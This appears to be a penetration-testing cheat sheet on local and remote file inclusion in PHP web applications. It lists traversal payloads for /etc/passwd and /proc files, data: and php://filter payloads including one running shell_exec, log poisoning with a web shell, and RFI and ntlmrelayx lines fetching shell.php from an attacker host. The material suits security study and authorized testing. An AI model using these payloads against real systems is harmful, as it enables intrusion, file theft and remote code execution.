File Inclusion Vulnerabilities¶

Local File Inclusion (LFI)¶

Occurs when a web application includes a file from the local server based on user input.
Can disclose files or lead to code execution (e.g., via log poisoning).
Example: http://example.com?page=../../etc/passwd
Sometimes a website might look for certain words to be included in the url
- Original: http://example.com/page.php?content=notes/page_1.txt
- Exploited: http://example.com/page.php?content=notes/../../../../etc/passwd

https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt
/proc/<pid>/cmdline
/proc/self/environ
/proc/self/stat
/proc/sched_debug

Example 1

<url>/menu.php?file=data:text/plain,hello world

Example 2

<url>/menu.php?file=data:text/plain,<?php echo shell_exec("whoami") ?>

LFI - Retrieve php page code in base64

<url>/something=php://filter/convert.base64-encode/resource=<php page>

LFI - Retrieve php page by directory

<url>/something=php://filter/resource=<php page>

Make a web request to the web server with some malicious content in it which would show up in the web server's log files.
- Change User-Agent to web shell
Once the malicious content is in the log file on the web server, make it display and possibly execute using an LFI vulnerability.
Example: http://example.com/log_file.php
Access php access logs
- Linux Log locations could be listed in /usr/local/etc/apache24/httpd.conf
- Possible windows log location - c:\xampp\apache\logs\access.log

http://example.com?page=http://<attacker_url>/shell.php

`<url>/?something=\\<attacker_ntlmrelayx>\shell.php?cmd=whoami`

Run ntlmrelayx and tell the web server to authenticate to it via SMB.

phpinfo()
- allow_url_include must be set to "On" for RFI to work
If RFI is found, get a webshell by accessing shell.php
- <victim url>/file=<attacker ip>/shell.php